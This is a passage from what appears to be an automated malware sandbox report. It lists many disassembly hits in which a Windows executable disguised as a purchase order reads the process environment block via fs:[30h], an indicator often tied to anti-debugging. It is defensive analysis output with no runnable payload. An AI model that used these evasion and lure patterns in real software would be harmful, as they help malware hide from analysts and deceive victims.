              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F904E5 mov ecx, dword ptr fs:[00000030h]0_2_00F904E5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC44B0 mov ecx, dword ptr fs:[00000030h]0_2_00FC44B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F964AB mov eax, dword ptr fs:[00000030h]0_2_00F964AB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBA470 mov eax, dword ptr fs:[00000030h]0_2_00FBA470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBA470 mov eax, dword ptr fs:[00000030h]0_2_00FBA470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBA470 mov eax, dword ptr fs:[00000030h]0_2_00FBA470
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB245A mov eax, dword ptr fs:[00000030h]0_2_00FB245A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8645D mov eax, dword ptr fs:[00000030h]0_2_00F8645D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010105A7 mov eax, dword ptr fs:[00000030h]0_2_010105A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010105A7 mov eax, dword ptr fs:[00000030h]0_2_010105A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010105A7 mov eax, dword ptr fs:[00000030h]0_2_010105A7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA430 mov eax, dword ptr fs:[00000030h]0_2_00FCA430
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C427 mov eax, dword ptr fs:[00000030h]0_2_00F8C427
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC5ED mov eax, dword ptr fs:[00000030h]0_2_00FCC5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC5ED mov eax, dword ptr fs:[00000030h]0_2_00FCC5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F925E0 mov eax, dword ptr fs:[00000030h]0_2_00F925E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F965D0 mov eax, dword ptr fs:[00000030h]0_2_00F965D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]0_2_00FCA5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]0_2_00FCA5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE5CF mov eax, dword ptr fs:[00000030h]0_2_00FCE5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE5CF mov eax, dword ptr fs:[00000030h]0_2_00FCE5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB45B1 mov eax, dword ptr fs:[00000030h]0_2_00FB45B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB45B1 mov eax, dword ptr fs:[00000030h]0_2_00FB45B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A456 mov eax, dword ptr fs:[00000030h]0_2_0104A456
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE59C mov eax, dword ptr fs:[00000030h]0_2_00FCE59C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C460 mov ecx, dword ptr fs:[00000030h]0_2_0101C460
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC4588 mov eax, dword ptr fs:[00000030h]0_2_00FC4588
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92582 mov eax, dword ptr fs:[00000030h]0_2_00F92582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92582 mov ecx, dword ptr fs:[00000030h]0_2_00F92582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A49A mov eax, dword ptr fs:[00000030h]0_2_0104A49A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98550 mov eax, dword ptr fs:[00000030h]0_2_00F98550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98550 mov eax, dword ptr fs:[00000030h]0_2_00F98550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101A4B0 mov eax, dword ptr fs:[00000030h]0_2_0101A4B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100C730 mov eax, dword ptr fs:[00000030h]0_2_0100C730
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA6C7 mov ebx, dword ptr fs:[00000030h]0_2_00FCA6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA6C7 mov eax, dword ptr fs:[00000030h]0_2_00FCA6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC66B0 mov eax, dword ptr fs:[00000030h]0_2_00FC66B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01014755 mov eax, dword ptr fs:[00000030h]0_2_01014755
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC6A6 mov eax, dword ptr fs:[00000030h]0_2_00FCC6A6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E75D mov eax, dword ptr fs:[00000030h]0_2_0101E75D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94690 mov eax, dword ptr fs:[00000030h]0_2_00F94690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94690 mov eax, dword ptr fs:[00000030h]0_2_00F94690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2674 mov eax, dword ptr fs:[00000030h]0_2_00FC2674
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103678E mov eax, dword ptr fs:[00000030h]0_2_0103678E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA660 mov eax, dword ptr fs:[00000030h]0_2_00FCA660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA660 mov eax, dword ptr fs:[00000030h]0_2_00FCA660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010447A0 mov eax, dword ptr fs:[00000030h]0_2_010447A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAC640 mov eax, dword ptr fs:[00000030h]0_2_00FAC640
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010107C3 mov eax, dword ptr fs:[00000030h]0_2_010107C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9262C mov eax, dword ptr fs:[00000030h]0_2_00F9262C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC6620 mov eax, dword ptr fs:[00000030h]0_2_00FC6620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8620 mov eax, dword ptr fs:[00000030h]0_2_00FC8620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE627 mov eax, dword ptr fs:[00000030h]0_2_00FAE627
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E7E1 mov eax, dword ptr fs:[00000030h]0_2_0101E7E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2619 mov eax, dword ptr fs:[00000030h]0_2_00FD2619
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F947FB mov eax, dword ptr fs:[00000030h]0_2_00F947FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F947FB mov eax, dword ptr fs:[00000030h]0_2_00F947FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E609 mov eax, dword ptr fs:[00000030h]0_2_0100E609
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9C7C0 mov eax, dword ptr fs:[00000030h]0_2_00F9C7C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F907AF mov eax, dword ptr fs:[00000030h]0_2_00F907AF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105866E mov eax, dword ptr fs:[00000030h]0_2_0105866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105866E mov eax, dword ptr fs:[00000030h]0_2_0105866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98770 mov eax, dword ptr fs:[00000030h]0_2_00F98770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90750 mov eax, dword ptr fs:[00000030h]0_2_00F90750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2750 mov eax, dword ptr fs:[00000030h]0_2_00FD2750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2750 mov eax, dword ptr fs:[00000030h]0_2_00FD2750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov esi, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov eax, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov eax, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov eax, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov ecx, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov eax, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC720 mov eax, dword ptr fs:[00000030h]0_2_00FCC720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC720 mov eax, dword ptr fs:[00000030h]0_2_00FCC720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90710 mov eax, dword ptr fs:[00000030h]0_2_00F90710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0710 mov eax, dword ptr fs:[00000030h]0_2_00FC0710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010106F1 mov eax, dword ptr fs:[00000030h]0_2_010106F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010106F1 mov eax, dword ptr fs:[00000030h]0_2_010106F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC700 mov eax, dword ptr fs:[00000030h]0_2_00FCC700
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]0_2_00FCC8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]0_2_00FCC8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E908 mov eax, dword ptr fs:[00000030h]0_2_0100E908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E908 mov eax, dword ptr fs:[00000030h]0_2_0100E908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C912 mov eax, dword ptr fs:[00000030h]0_2_0101C912
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0102892B mov eax, dword ptr fs:[00000030h]0_2_0102892B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101892A mov eax, dword ptr fs:[00000030h]0_2_0101892A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE8C0 mov eax, dword ptr fs:[00000030h]0_2_00FBE8C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01010946 mov eax, dword ptr fs:[00000030h]0_2_01010946
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034978 mov eax, dword ptr fs:[00000030h]0_2_01034978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034978 mov eax, dword ptr fs:[00000030h]0_2_01034978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C97C mov eax, dword ptr fs:[00000030h]0_2_0101C97C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90887 mov eax, dword ptr fs:[00000030h]0_2_00F90887
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94859 mov eax, dword ptr fs:[00000030h]0_2_00F94859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94859 mov eax, dword ptr fs:[00000030h]0_2_00F94859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0854 mov eax, dword ptr fs:[00000030h]0_2_00FC0854
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov esi, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov eax, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov eax, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA2840 mov ecx, dword ptr fs:[00000030h]0_2_00FA2840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010269C0 mov eax, dword ptr fs:[00000030h]0_2_010269C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA830 mov eax, dword ptr fs:[00000030h]0_2_00FCA830
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov ecx, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105A9D3 mov eax, dword ptr fs:[00000030h]0_2_0105A9D3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E9E0 mov eax, dword ptr fs:[00000030h]0_2_0101E9E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC29F9 mov eax, dword ptr fs:[00000030h]0_2_00FC29F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC29F9 mov eax, dword ptr fs:[00000030h]0_2_00FC29F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C810 mov eax, dword ptr fs:[00000030h]0_2_0101C810
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
